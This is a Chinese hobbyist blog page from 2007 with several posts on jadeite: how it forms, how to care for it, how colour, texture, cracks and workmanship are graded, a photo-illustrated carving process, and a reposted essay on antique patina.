翡翠是如何形成的？民间有很多神奇的传说；地质学家以前一直把它看成一个谜，曾有人认为翡翠与钻石一样，都是在地壳深部几千度高温，高压条件下结晶形成的，其实不然；美国不少地球物理学家在实验室做了大量的仿真实验，再结合世界各地发现翡翠矿床的实际情况，他们认为，翡翠并不是在高温情况下形成的，而是在中─低温条件下在极高压力下变质成因的。

      缅甸联邦政府每年举办一次翡翠拍卖会，吸引了不少买家。

      日本东北大学砂川一郎教授在《话说宝石》（1983年出版）一书中，更具体指出翡翠是在一万个大气压和比较低的温度（200 - 300oC ）下形成的。我们知道地球由地表到深部，越往深处温度越高，压力也越大。但翡翠既是在低温高压条件下结晶形成，当然不可能处于较深部份，那么高压究竟从何而来呢？

      这高压是由于地壳运动引起的挤压力所形成的，现已获得证实，凡是有翡翠矿床分布的区域，均是地壳运动较强烈的地带。

      还有另外一个因素是：凡发现有翡翠形成的地方均有含钠长石的火成岩侵入体（中─基性岩）。钠长石的化学成份为 NaAlSi3O8，所以可以推测翡翠是在中─低温、高压条件下由含钠长石的岩石去硅作用而形成的

查看(130) 评论(1) 收藏分享管理
[论坛] 发些古代玉玺给大家欣赏!

2007-03-30 01:32:20

100200008.jpg

查看(146) 评论(7) 收藏分享管理
[论坛] 现代版的it乞丐,深有感触!

2007-03-26 22:11:08

20070321_3aca8e24865bb507e3b1H6Udv1aaQBze.jpg

查看(120) 评论(7) 收藏分享管理
[论坛] 大话翡翠-之翡翠基本知识!

2007-03-24 23:17:17

如果说翡翠要“养”是不是有点新鲜？翡翠虽不是动物、植物，但它确需护养。大家知道翡翠有种，种有“老”有“嫩”，种“老”的其结晶颗粒细小，晶隙细微，种“嫩”的结晶颗粒粗大，晶隙宽大，在晶隙中含有一定的水分。翡翠的生成地，地上地下水源丰富，翠石里自然含有较丰富的水分子，到北方干燥的环境里，不养护失水是自然的事，尤其是那些种粗的翡翠失水就更加容易，失水就使其变得干，干了后就会产生绺和裂，绺裂多了翡翠就会失去其美丽。种“老”的翡翠其晶隙极其细微，这样就能保持其原有的水头，永久不变。翡翠为什么要“养”，原因就在此，因此民仁福的翡翠专家一般会先介绍“种”（即翡翠的质地），也会推荐种老的产品。
如何“养”翡翠饰品呢？是不是把它包装好压箱底即是护养？这不全对，只是一般的保护，保护饰品外形不受外力破坏，而对其内在的失水起不到作用，其实最好的“养护”最简单最实用的方法就是作为人的装饰物佩挂在身上即可，不论它在人体的哪个部位都有人体温润的小环境。常常佩挂即会补充翠的失水，使其润泽，水头得到改善，一些“棉”“絮”就可以消退变透，这就叫“人养玉”。归纳护养翡翠饰品有三点：第一是忌硬碰硬，使翡翠饰品受损；第二是切忌高温暴晒，以免翡翠饰品失水失泽，干裂失色；第三是经常佩挂，经常用软布或软刷浸水刷去留在上面的污秽。但愿所有拥有翡翠的人“养”好翡翠，“养”出美丽，丰富我们的生活。
翡翠的色彩鉴赏
翡翠的色彩异常丰富，它是评价翡翠优劣和价值极为重要的一个因素。在众多的颜色中以红、绿、紫三色为主，它们都是翡翠中的高档颜色，其中尤其以绿色最为艳丽与名贵。因此，"绿翠"一词几乎成了翡翠的同义词。翡翠绿色的深浅、浓艳、透明度高低、有无瑕疵，常常是判断一件翡翠优劣的最直接的因素。
　　

在传统分色上，人们将翡翠的绿色以"浓"、"阳"、"俏"、"正"、"和"为上，反之则以"淡"、"阴"、"老"、"邪"、"花"为下。所谓"浓"，系指翡翠的颜色表现为深绿青翠而不带黑色，而绿色比较浅微的，则为"淡"。"阳"就是颜色要明亮鲜艳，看上去使眼睛一亮，而阴暗不明亮的则?quot;阴"。"俏"，则是指翡翠的绿色要显得晶莹美丽而且可爱，反之则为"老"。"正"，颜色要纯正，不带其他杂色，如带有杂色，就显得"邪"了。"和"，绿色要均匀一致，如果绿色分布深浅不一，或者呈丝条状者，就被称为"花"了。

由于翡翠的绿色不同，为了区别这些绿翠，珠宝行业中给这些不同的翡翠绿色，冠之以最形象，最恰如其分的名称，我们除了能从这些名称中区别翡翠的品种外，更能看到翡翠内涵的文化性。

翡翠绿色中的上品有四种：宝石绿，为深浓的正绿，不带任何黄色，透明度好，高雅而庄重。因其色似祖母绿，故又“祖母绿”；玻璃绿，系指色艳绿如玻璃般明净通透，鲜艳而明亮，透明度好；秧苗绿，绿色中略呈黄，透明度好，色感活泼有朝气，因其色如翠绿的秧苗，故又有"葱心绿"与"黄阳绿"之名；艳绿，多指不带任何黄色和蓝色的中度深浅的正绿，纯正，透明度高，美丽而大方，有的地方称为"翠绿"。这四种最为名贵，尤以宝石绿为最佳。其它如中品的阳俏绿、鹦哥绿、菠菜绿、浅水绿、浅阳绿、豆青绿、丝瓜绿，至于蛤蟆绿、瓜皮绿、梅花绿、灰绿、蓝绿、油绿、木绿则又等而下之

　　翡翠的绿淋漓尽致地体现出了翡翠的迷人魅力，是构成翡翠身价高低的非常重要的因素，更为奇妙的是，这些绿色又呈现不同的形状，如带状的带子绿，大小不等、互不相联的呈块状的团块绿，丝絮状的丝絮绿，另外如丝块绿、均匀绿、靠皮绿，这就使得翡翠绿色更加变幻莫测。另外，专家常常根据绿色的大致的排聚的方向，即绿色的走向，寻找绿色变化的规律，从而正确判断绿色的深浅与厚薄的程度。

　　翡翠的色彩并非是单纯存在的，它是通过翡翠的质地而呈现的。首先是它的透明度。透明度是鉴定宝石与玉石的主要技术依据。翡翠的透明度，在珠宝行业中，又俗称"水头"或"水"，透明度高者，常说成水头足，水头好，水头长。透明度越高越好。通常测试翡翠水头的方法是，如光线能穿越玉料中达到3mm的深度，为一分水，如能达到二分水的翡翠就可以认定为上等质量了。根据水头的差异，将那些水头足，透明或半透明的翡翠，称为"老种"。老种，色彩亮润，色与底融为一体，质地细腻致密，硬度、密度和折射率均较高。而那些不透明，发干、发瓷、水头少、光泽不亮，质量较差的，则称为"新种"。新种虽说也会有鲜嫩的颜色，但因水头差，而显得色调呆板，质感干巴。还有一种介于新、老种之间的便称为"新老种"。

　　影响翡翠色彩的因素，还有底障。底障又可称地障与地子。它多指翡翠质地的干燥程度，也可以讲地子是没有绿色的翠，而翠又是有色的地子。地子的颜色没有一定的形状特点，常表现为深浅不同的无色，白、灰、藕色以及浅绿色等。

　　翡翠地子的质地是由其结构的精细程度，水头以及杂质与绺裂多少而决定的。根据它的颜色，水头和净度来形容地子的名称多达数十种。例如玻璃地、蛋清地、清水地、冰地、紫水地、灰水地、无青地、香灰地、藕粉地、湖绿地、油青地、青花地、浑水地、白花地、白沙地、细白地、灰沙地、石灰地、糙白地、狗屎地，以及皮包水等。

　　常见的如玻璃地，结构细腻，水头足，绿色均匀，呈半透明状态，如玻璃一般；而蛋清地则晶体颜色偏白，犹如蛋清一般，水头足，呈半透明，又称为糯化地；清水地指地子无色或颜色均匀，水头充足，犹如冰般晶莹，故又“冰地”。其他如油青地、藕粉地、干地、狗屎地等则水头和净度都每况愈下，质量等而下之。

　　地子是决定翡翠优劣的重要依据，它是挑选与鉴别翡翠的第一个直观感觉，凡收藏者都必须将其来龙去脉弄清。地子，在港台地区称为"种"。

　　在翡翠的地子与翠色之间，还有一种相互印染层，被称为"照映"。照映对翡翠的色泽起着很大的关连作用。好的照映，就会将翠色衬托得晶莹柔和，地子也会被映得润滑融和；反之则使翠色与地子显得强硬，生板，有种截然隔离的呆板感。所以照映的好与否，直接影响到翡翠的色彩的柔和。因为照映的重要性，有人就将它比喻为翡翠?quot;灵气"。这是不无道理的。

　　影响到翡翠色彩好坏的还有"绺"。绺，是民间俗称，实际上它是翡翠上各种裂痕，有大有小，有细有粗，大的绺裂有恶绺、大绺、通天绺等。小的绺裂有小碎绺、层绺、立绺等。特殊的绺裂有随绿绺等。
运用六要素对成品翡翠进行鉴别之（三）
翡翠的“色”“花”空间
翡翠王说翠

翡翠因为有绿才被称为宝石，这在玉石大家族中是绝无仅有的。因此，翡翠的“色”仅指绿色，绿以外的颜色一般不称为“色”，只称为“花”。

好“色”的关键词

绿的好坏直接影响翡翠的价格，可谓“色高一成，价高十倍”。判别翡翠的绿色应从它的种、水、色调等综合观察。看其显色部位水头是否足；致色矿物的颗粒是否细腻，结构是否致密；色调是否纯正。可以归纳为；“浓、阳、正、匀、活”者为色好；“淡、阴、偏、散、呆”者为色差。其中色正或偏、色活或呆具有重要的鉴别意义。

黄色VS蓝色

翡翠的绿是否艳丽纯正，取决于其中的黄、蓝成份是否匹配。如果黄味足，蓝的成份也恰如其分，则绿色阳而纯正，叫做色正；若黄味不足或欠黄，且蓝的成份过了头，则绿色阴而不正，色偏蓝，这叫色偏；若黄味过多、蓝份不足，则绿色泛黄、浮嫩不耐看，也叫色偏。

活色生值

色偏与正对翡翠的价格影响虽大，但关键还在于一个“活”字，色活价高，色呆价低。“色活”就是指有色的部位种、水好。种、水差则色死、“色呆”。“色活”是什么概念呢？她似流淌的一汪绿水，波光粼粼；她是苍翠欲滴的“一匹水”，晶莹剔透；她像映照夜空的萤火虫，碧绿生辉。这才是真正的“含色含种”的好翠。

浓匀有度

色浓有度

色浓为好，但要浓淡适中。过浓而色老、发闷、阴沉，反而价低。

色匀、纯净者，价位高。色散呈星散状、团块状、斑杂状、分布不匀、含杂质者，其价不高。但不应拒绝有黑斑点的好翠，因为这是天然印记。正是这些黑色矿物中的致色元素铬，经扩散作用置换了铝元素而显绿色，这些残余的黑斑，小的叫“色根”，大的叫“色渣”，再大就叫“癣”，癣脚下往往出高翠。

形象“色”名

翡翠的色千变万化，但可以用形象法命名对它进行标准化色级划分，例如：色偏蓝的有菠菜绿、瓜绿等；色偏黄的有黄杨绿、葱心绿等；色匀色活的绿在命名中多加“水”字，如艳水绿、蓝水绿都是翠中极品。还有墨绿、灰绿等很多都可以叫。最多的绿是豆绿，“十绿九豆”，价值较低。

“花”花世界

“花”——蓝花、豆花、莼花等使翡翠更加丰富多彩。对花的判别也讲究一个“活”字，例如一只飘花手镯，“花”活有游动感，手镯才有价。莼花是紫罗兰色，有人也将浓而艳的莼当成色。但常将“莼”误写成“春”字。“莼”是水生草本植物，其花呈粉红色、紫罗兰翡色形象地称为“莼花”是有道理的，而“春”没有颜色概念，所以不能错用。

民仁福词典

Q：什么样的翡翠要种老、水头足、颜色好、做工精湛，缺陷很少的为好，具备这五个条件的翡翠在总体上说是极少极少的，还得有精湛的做工、理想的题材及可读的内容，如名师名家雕刻的作品等。正如人无完人，金无足赤一样，自然的东西都会有些天然的缺陷，这是宇宙的产物。因此要看个人对它的要求，有条件的应该去追求比较完美的翡翠。

运用六要素对成品翡翠进行鉴别之（四）

聚焦翡翠“裂”与“工”

翡翠王说翠

与翡翠的绺裂面对面

翡翠的绺裂是在地质应力作用下形成的，任何一块翡翠毛料几乎都有会无一幸免。成品翡翠不论品质高低，最忌伤害性绺裂，合格的工艺师会在雕琢中合理地避让绺裂。

翡翠加工有光身和花草两种基本技法，对有色部位要用光身做才会出好的效果；虽有裂绺但无大害者，可做雕花处理，把绺裂遮掩住，即所谓“无绺不做花”。

一般来说，光身件不能有绺裂，尤其戒面类。手镯至少不应该有明显的裂。花件摆件则允许有少许绺裂存在，但绝不能对成品造成伤害。

绺裂对成品翡翠的质量虽有较大影响，但它却是天然的印记难以避免。俗话说“十宝九裂”，过于完美便是假。例如“B货”看似完美无裂，但却是遭酸蚀破坏后的垃圾翡翠，经有机胶真空充填加固而成的，已毫无真实可言。因此，对虽有少许绺裂而又并不影响美感和使用耐久性的成品翡翠，应该得到认可。

做工决定价值

不同货形的翡翠做工要求不尽相同，以首饰类而言，光身和花件的工艺要求各有侧重。

光件——光亮如镜

光身件主要包括戒、马鞍戒、手镯、佛珠等，其中戒面有蛋、马眼、水滴、圆形、心形、月形、梨形、方形等，它们都可作为首饰镶嵌件的主石。戒面要形正、丰满，不要挖底；手镯形要规整，条子粗细要均匀一致。所有光身件的表面都应平顺光亮如镜。

花件——博大精深

花类包括挂件和把玩件，不仅要求工艺精良，还应有丰富的文化内涵。万年的中华玉文化在世界文化史上独树一帜，自翡翠从缅甸输入中国之后就逐渐取代了白玉的主流地位，作为传承玉文化的最佳载体，翡翠花件最能表达博大精深的文化蕴涵。

花件虽小，却可以通过图腾纹饰把人们的思想情趣、道德理念表达出来。传统题材多与平安、吉祥、如意、属相及儒、释、道等相关，其中福、禄、寿、喜、财最为广泛，所谓“图必有意、意必吉祥”。图形纹饰以人物、动物、花木、瓜果、文字最为常见，常用“假托”、“转喻”、“谐音”等表现手法形象地传情表意。例如“福在眼前”是蝙蝠与古铜钱组合，“福”取“蝠”的谐音，“眼前”取意有眼的钱。“岁寒三友”则是“转喻”之作，松、竹、梅的组合，傲立霜雪、或经冬不凋、或迎寒开花，喻友情真挚、莫逆之交。此外，现代人的时尚观念与西方文化的交融也将促进翡翠文化的发展。

TIPS：精工准则

做工精良的花件应该构思巧妙，寓意深远，能把翡翠的石质美充分地调动和展现出来，给人一种自然美的享受。

民仁福词典

Q翡翠的种是什么？水头又怎么看？

民仁福：种是指翡翠材料的质地，、翡翠质地细密即种较老或老；晶体之粗松，就叫嫩。因为翡翠是多晶体的结合体，因此种被形象地分成玻璃种、冰种、蛋清种、糯种、豆种等。玻璃种最好，豆种以下很差就不可取，细糯种以上就不错。做B货大部分是粗豆种以下的材料。

翡翠材料有透明、半透明、不透明，行内即称之为水头足与不足或叫没水。一般说种老的料水头也会足，种粗的则水头不足，反过来有水头的却不一定种就老。

查看(233) 评论(4) 收藏分享管理
[论坛] 溪山垂钓--一件玉件的雕刻过程图[精]

2007-03-15 10:50:48

当一块玉料拿到手中，首先要做的是仔细的审视它的玉性、绺裂、瑕疵等情况，对好坏部分了然于胸
。这叫“相玉”。
看玉要“转”着看：正面、背面、侧面、顶面......
是一块绺裂比较多的籽料，挂淡淡的黄皮，质不错，但必须施以雕工才可体现其拥有的价值。
如若顺裂切开，就会细碎的不值一钱；如果将绺裂尽数挖去，又会破坏完整的料形。
办法只有一个："借"!借裂为纹,挖脏遮绺。
顺便说一句：为重现整个过程，我将已画完的墨迹去除重来了一次

190809.jpg

190723.jpg

190736.jpg

190745.jpg

190800.jpg

190809.jpg

查看(833) 评论(47) 收藏分享管理
[论坛] 话说包浆

2007-03-14 23:55:22

整理电脑，又发现一些很好的文章，给大家转贴：

凡是喜欢古玩的人，莫不重视包浆......

几年之前，曾与三位朋友在报刊上合写过一个专栏，定名为"茗古屋杂记"。如今时过境迁，朋友们皆有进步，各修胜业，无暇再来写这样的小块文章。无奈"茗古屋"乃是笔者的书斋，谚云：逃得了和尚逃不了庙，晚报新民生收藏版编辑寻迹而至，只好重新持笔。环顾四壁的坛坛罐罐、花花草草，独自在灯下，斟一盏苦茶，啜茗谈古，兴趣依旧。

　　笔者之于收藏，既非学者更非专家，只不过在悬壶诊病之余，爱好把玩前朝器物，偶有心悟，轻薄为文而已。倘有唐突斯文，荒腔走板之处，也极盼读者的指教。

　　凡是喜欢古玩的人，莫不重视包浆。记得有一位今天已成为大收藏家的朋友，当年初涉古玩，经人介绍，在某"败落大人家"的子孙手中买到一大批古印，他竟一律用细砂皮将包浆磨去，至今仍成为朋友圈子里的笑柄。

　　那么，什么是包浆呢？你去问收藏家，他的回答往往不是语焉不详，便是高深莫测，颇有一点可意会不可言传的意思。

　　其实包浆也就是以物品为载体的岁月留痕。它是在悠悠岁月中因为灰尘、汗水，把玩者的手泽，或者土埋水浸，经久的摩挲，甚至空气中射线的穿越，层层积淀，逐渐形成的表面皮壳。它滑熟可喜，幽光沉静，告诉你，这件东西有了年纪，显露出一种温存的旧气。那恰恰是与刚出炉的新货那种刺目的"贼光"，浮躁的色调，干涩的肌理相对照的。

　　不只瓷器、木器、玉器、铜器、牙雕等有包浆，连书画碑拓等薄如蝉翼的纸绢制品在内行人眼里也统统有包浆。

　　包浆既然承托岁月，年代越久的东西，包浆越厚。举一个简单的例子，新买来的竹席，不论打磨得多少光滑，都不算有包浆，但老祖母睡了五十年的竹席，包浆红亮不待言说。新锄头的把柄没有包浆，老农民的锄头柄，无不包浆厚实。

　　鉴定古物，包浆甚为重要。倘你还不具备"望而知之"的功力，一时还搞不清楚古物的形制、时代面貌、工艺特征、不妨可以从包浆入手，搞清楚什么是真正的旧包浆。如果一件古物包浆是真旧的，是到那个年纪的，工艺又不错，你看了欢喜，买下来，虽不中，亦不远矣。

　　包浆有很多，但假包浆是匆忙做出来的，浮滑急躁，急功近利的马脚终将露出，多看多摸多想，真假判然可分。就像黄瓜、丝瓜、茄子，从没见过的人，你怎么说也不甚了了，倘拉他到菜场去，几分钟之内，他就一辈子忘不了了。

　　我在初学时，对包浆的区分也颇为困惑。于是跑到一家古董茶馆，请教老先生，此时刚巧走进一个乞丐，伸手乞钱，老先生指着乞丐说，你看这袖口、衣领、前襟，包浆有多厚！又指着那张饱经风霜皱纹深刻的脸：你看这刀工！又指着脖子上的老膏污垢：你看这灰皮！又指着那通红的酒糟鼻：你看这沁色！

　　我翻遍书本解不开的困惑，全明白了。

　　真是十步之内必有芳草，谁说教育家都在大学的讲台上！

查看(185) 评论(13) 收藏分享管理